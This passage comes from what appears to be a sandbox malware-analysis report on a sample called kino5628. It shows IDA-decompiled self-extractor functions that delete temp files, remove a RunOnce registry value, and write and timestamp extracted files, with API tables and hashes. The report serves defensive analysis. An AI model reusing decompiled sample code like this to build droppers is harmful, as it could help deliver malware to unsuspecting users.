				_t21 = __ebx;
				_t9 =  *0x8e8004; // 0xaf179a30
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x8e91e0; // 0x2af7a60
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x8e8a24 == 0 &&  *0x8e9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x8e8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x8e8a24 == 0 &&  *0x8e9a30 == 0) {
					_push(_t22);
					E008E1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x8e9a34 & 0x00000020) != 0) {
						E008E65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E008E2390( &_v268);
					_t11 =  *0x8e8a20; // 0x0
				}
				if( *0x8e9a40 != 1 && _t11 != 0) {
					_t11 = E008E1FE1(_t22); // executed
				}
				 *0x8e8a20 =  *0x8e8a20 & 0x00000000;
				return E008E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x008e52b6
0x008e52b6
0x008e52b6
0x008e52c1
0x008e52c8
0x008e52cb
0x008e52cc
0x008e52d4
0x008e52d6
0x008e52d7
0x008e52de
0x008e52e0
0x008e52f2
0x008e52fa
0x008e52fa
0x008e5302
0x008e5305
0x008e530c
0x008e5312
0x008e5316
0x008e5316
0x008e5317
0x008e531c
0x008e531f
0x008e5333
0x008e5345
0x008e5351
0x008e5359
0x008e5359
0x008e5363
0x008e5369
0x008e536f
0x008e5374
0x008e5374
0x008e5381
0x008e5387
0x008e5387
0x008e538f
0x008e53a0

APIs

SetFileAttributesA.KERNELBASE(02AF7A60,00000080,?,00000000), ref: 008E52F2
DeleteFileA.KERNELBASE(02AF7A60), ref: 008E52FA
LocalFree.KERNEL32(02AF7A60,?,00000000), ref: 008E5305
LocalFree.KERNEL32(02AF7A60), ref: 008E530C
SetCurrentDirectoryA.KERNELBASE(008E11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E5363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E5334

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-1116576409
Opcode ID: 8c83824deef85e733a0b8ac4472444095a20efa4c3cbc1049164d81c574e7af9
Instruction ID: f511ec86f9b19a147bc22af71ad758c078b6aed81953a86111fd89dc5912ab45
Opcode Fuzzy Hash: 8c83824deef85e733a0b8ac4472444095a20efa4c3cbc1049164d81c574e7af9
Instruction Fuzzy Hash: 6021C631510AE4DBDB249B15DD89B6D77B4FB17B58F040169E885DA3A0CFF45C84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 008E1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x8e8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x008e1fee
0x008e2005
0x008e200d
0x008e2017
0x00000000
0x008e2020
0x008e200d
0x008e2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,008E538C,?,?,008E538C), ref: 008E2005
RegDeleteValueA.KERNELBASE(008E538C,wextract_cleanup1,?,?,008E538C), ref: 008E2017
RegCloseKey.ADVAPI32(008E538C,?,?,008E538C), ref: 008E2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008E1FFB
wextract_cleanup1, xrefs: 008E1FE7, 008E200F

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: eb3075705b06731ea678c34d014dc777841e9845c62bc5d4e5fb1c3ea2fec31c
Instruction ID: e67b571821f9a3f4c46a70fa3097a6ca31925a55a7d711ae92d459f95e2964a1
Opcode Fuzzy Hash: eb3075705b06731ea678c34d014dc777841e9845c62bc5d4e5fb1c3ea2fec31c
Instruction Fuzzy Hash: B6E04F31550798FBD7259B92ECCAF5D7B2DF702B40F100194B908E41A1EB716E14D605

Uniqueness

Uniqueness Score: -1.00%

Function 008E4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008E4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x8e8004; // 0xaf179a30
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x8e91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E008E4E99(_t75);
						L35:
						return E008E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x8e8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x8e91e4;
						_t58 = 0x8e91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x8e91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x8e91e4;
						_t30 = E008E4702( &_v268, 0x8e91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E008E476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E008E4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E008E47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x8e93f4 =  *0x8e93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x8e91e4;
						_t63 = 0x8e91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x8e91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x8e91e4;
						_t30 = E008E4702( &_v268, 0x8e91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E008E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E008E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E008E4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x008e4cd0
0x008e4cdb
0x008e4ce0
0x008e4ce2
0x008e4cee
0x008e4cf2
0x008e4d0e
0x008e4d0e
0x008e4d11
0x008e4e83
0x008e4e88
0x008e4e98
0x008e4e98
0x008e4d17
0x008e4d17
0x008e4d1a
0x008e4d2f
0x008e4d2f
0x00000000
0x008e4d2f
0x008e4d1c
0x008e4d1c
0x008e4d1f
0x008e4dcb
0x008e4dd0
0x008e4dd2
0x008e4ddd
0x008e4ddd
0x008e4de3
0x008e4de8
0x008e4ded
0x008e4ded
0x008e4def
0x008e4df0
0x008e4df0
0x008e4df4
0x008e4df4
0x008e4df6
0x008e4df9
0x008e4dfc
0x008e4dfc
0x008e4dfe
0x008e4dff
0x008e4dff
0x008e4e03
0x008e4e08
0x008e4e0a
0x008e4e0f
0x008e4d03
0x008e4d03
0x00000000
0x008e4d03
0x008e4e18
0x008e4e20
0x008e4e25
0x008e4e27
0x00000000
0x00000000
0x008e4e33
0x008e4e38
0x008e4e3a
0x00000000
0x00000000
0x008e4e40
0x008e4e51
0x008e4e56
0x008e4e5b
0x008e4e5e
0x00000000
0x00000000
0x008e4e6a
0x008e4e6f
0x008e4e71
0x00000000
0x00000000
0x008e4e77
0x008e4e7d
0x00000000
0x008e4e7d
0x008e4d25
0x008e4d25
0x008e4d28
0x008e4d36
0x008e4d3b
0x008e4d40
0x008e4d40
0x008e4d42
0x008e4d43
0x008e4d43
0x008e4d47
0x008e4d4a
0x008e4d4a
0x008e4d4c
0x008e4d4f
0x008e4d4f
0x008e4d51
0x008e4d52
0x008e4d52
0x008e4d56
0x008e4d5b
0x008e4d5d
0x008e4d62
0x00000000
0x00000000
0x008e4d67
0x008e4d6f
0x008e4d74
0x008e4d76
0x00000000
0x00000000
0x008e4d7c
0x008e4d84
0x008e4d89
0x008e4d8b
0x00000000
0x00000000
0x008e4d94
0x008e4d99
0x008e4d9e
0x008e4da1
0x008e4daa
0x008e4daa
0x008e4da3
0x008e4da3
0x008e4da3
0x008e4db5
0x008e4dbb
0x008e4dbd
0x00000000
0x008e4dc3
0x008e4dc5
0x00000000
0x008e4dc5
0x008e4dbd
0x008e4d2a
0x008e4d2a
0x008e4d2d
0x00000000
0x00000000
0x00000000
0x008e4d2d
0x008e4cf8
0x008e4cfd
0x008e4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 008E4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 008E4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E4D36, 008E4DE3

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-1116576409
Opcode ID: 50c38234fb0691cc8d13d331b15f5d32d63aedd901c5f0c2547c1cae7b996cb4
Instruction ID: cba1b082fb9a1e6968b13fe9f7c5040e2d852cf424510b8b45cdf9878aab1bbc
Opcode Fuzzy Hash: 50c38234fb0691cc8d13d331b15f5d32d63aedd901c5f0c2547c1cae7b996cb4
Instruction Fuzzy Hash: A04145367001868BCB259F3ADD446F973A6FB47310F185668E88ED7282DB31DE4AC790

Uniqueness

Uniqueness Score: -1.00%

Function 008E4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x8e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x8e8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x008e4c40
0x008e4c4a
0x008e4c8d
0x00000000
0x008e4c70
0x008e4c70
0x008e4c7e
0x008e4c86
0x00000000
0x00000000
0x00000000
0x008e4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 008E4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008E4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 008E4C7E

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: a77d9b96d5243d077c1aa34da9014bde986342a960ce462251762b9c4407e5d4
Instruction ID: 22d34ff77c75dacff9d9b99ccfaaac2ccbfd1e375e94abe596dcfae695e3550a
Opcode Fuzzy Hash: a77d9b96d5243d077c1aa34da9014bde986342a960ce462251762b9c4407e5d4
Instruction Fuzzy Hash: 37F0907260138CAF9B25DFB6CC88DBB77ACFB09644B44052AA81AC3050EA34F914D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 008E487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008E487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E008E490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x008e4880
0x008e488c
0x008e4894
0x008e48a0
0x008e48c9
0x008e48ce
0x008e48a2
0x008e48a8
0x008e48b7
0x008e48bc
0x008e48aa
0x008e48ac
0x008e48ac
0x008e48a8
0x008e48de
0x008e48e7
0x008e490b
0x008e48ee
0x008e48f0
0x00000000
0x008e4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,008E4A23,?,008E4F67,*MEMCAB,00008000,00000180), ref: 008E48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,008E4F67,*MEMCAB,00008000,00000180), ref: 008E4902

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 570eb7ca2b16292006efa1d099c99d2ce7bffb2ef6d2deefc1203adb738c4b19
Instruction ID: 2000b8827f94f2cf564d828aec039554e92a13504b311103bc0e83aa3ae4788c
Opcode Fuzzy Hash: 570eb7ca2b16292006efa1d099c99d2ce7bffb2ef6d2deefc1203adb738c4b19
Instruction Fuzzy Hash: 37014BA3E115B426F324502A4C88FB7551CEB97B34F1B1334BDAEEB1D2D5A45C0481E0

Uniqueness

Uniqueness Score: -1.00%

Function 008E4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008E4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x8e858c; // 0x268
				_t9 = E008E3680(_t20);
				if( *0x8e91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x8e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x8e9400; // 0xdce00
							_t15 = _t14 + _t25;
							 *0x8e9400 = _t15;
							if( *0x8e8184 != 0) {
								_t21 =  *0x8e8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8e93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x008e4ad5
0x008e4adb
0x008e4ae7
0x008e4aee
0x008e4b05
0x008e4b0d
0x008e4b14
0x008e4b1a
0x008e4b1c
0x008e4b21
0x008e4b2a
0x008e4b2f
0x008e4b31
0x008e4b39
0x008e4b54
0x008e4b54
0x008e4b39
0x008e4b2f
0x008e4b0f
0x008e4b0f
0x008e4b0f
0x008e4b5e
0x008e4ae9
0x008e4aed
0x008e4aed

APIs

Part of subcall function 008E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008E369F
Part of subcall function 008E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008E36B2
Part of subcall function 008E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008E36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 008E4B05

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: b3f544273bfb82ca8aedf973c0ea69a408224e1d92667c102831e9d44389aac5
Instruction ID: 59577d45536d8403e8816efc9e84c1141e31182f895f75fa2434673c0754e99d
Opcode Fuzzy Hash: b3f544273bfb82ca8aedf973c0ea69a408224e1d92667c102831e9d44389aac5
Instruction Fuzzy Hash: EB018C31200285ABDB158FAADC85BA6775AFB85735F049225F93DDB1E0CBB1D811CB81

Uniqueness

Uniqueness Score: -1.00%

Function 008E658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x8e8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x8e8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E008E16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x008e6592
0x008e6594
0x008e6596
0x008e6598
0x008e6598
0x008e659b
0x008e659b
0x008e659d
0x008e659e
0x008e65a2
0x008e65a4
0x008e65a9
0x008e65b2
0x008e65b6
0x008e65ba
0x008e65c3
0x008e65c5
0x008e65c8
0x008e65c8
0x008e65c3
0x008e65c9
0x008e65cc
0x008e65d2
0x008e65d1
0x008e65d1
0x00000000
0x008e65dc
0x00000000

APIs

CharPrevA.USER32(008E8B3E,008E8B3F,00000001,008E8B3E,-00000003,?,008E60EC,008E1140,?), ref: 008E65BA

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 17a744063d1ff63d6eb2fa608ae0692d0cf243b78746ad070be64c7c08360fa4
Instruction ID: c00d59fc7807cece5052db3f30fce3b5ae99ecd20f99ecfb9f03628ebd183f35
Opcode Fuzzy Hash: 17a744063d1ff63d6eb2fa608ae0692d0cf243b78746ad070be64c7c08360fa4
Instruction Fuzzy Hash: D3F042327042D09BD731091F9884B77BFDDFBA7390F18055EE8DAC3215EA655C5583A1

Uniqueness

Uniqueness Score: -1.00%

Function 008E621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E008E621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x8e8004; // 0xaf179a30
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E008E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E008E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x8e9124 = E008E6285();
					_t9 = 0;
				}
				return E008E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x008e6229
0x008e6230
0x008e6247
0x008e626a
0x008e6272
0x008e6249
0x008e6255
0x008e625f
0x008e6264
0x008e6264
0x008e6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008E623F

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Part of subcall function 008E6285: GetLastError.KERNEL32(008E5BBC), ref: 008E6285

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 18baedc9e68f11fbb6be214a6cd678e1b72b7b47a3a3f44c5d2e5b607b4d3af8
Instruction ID: a8c420fb19e1be8d4ece8db376f8dd3bfacac7627d86ef2eb060b836fa852e49
Opcode Fuzzy Hash: 18baedc9e68f11fbb6be214a6cd678e1b72b7b47a3a3f44c5d2e5b607b4d3af8
Instruction Fuzzy Hash: ECF05970700248ABD750EB398D02FBE37ACFB55700F000069BA89DB082FD749C548651

Uniqueness

Uniqueness Score: -1.00%

Function 008E4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x8e8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x8e8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x8e8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x8e8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x8e8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x8e8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x8e8d6c)) = 0;
				return 0;
			}

0x008e4b66
0x008e4b74
0x008e4b98
0x008e4ba0
0x00000000
0x008e4bac
0x008e4ba4
0x00000000
0x008e4ba4
0x008e4b78
0x008e4b7e
0x008e4b84
0x008e4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,008E4FA1,00000000), ref: 008E4B98

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

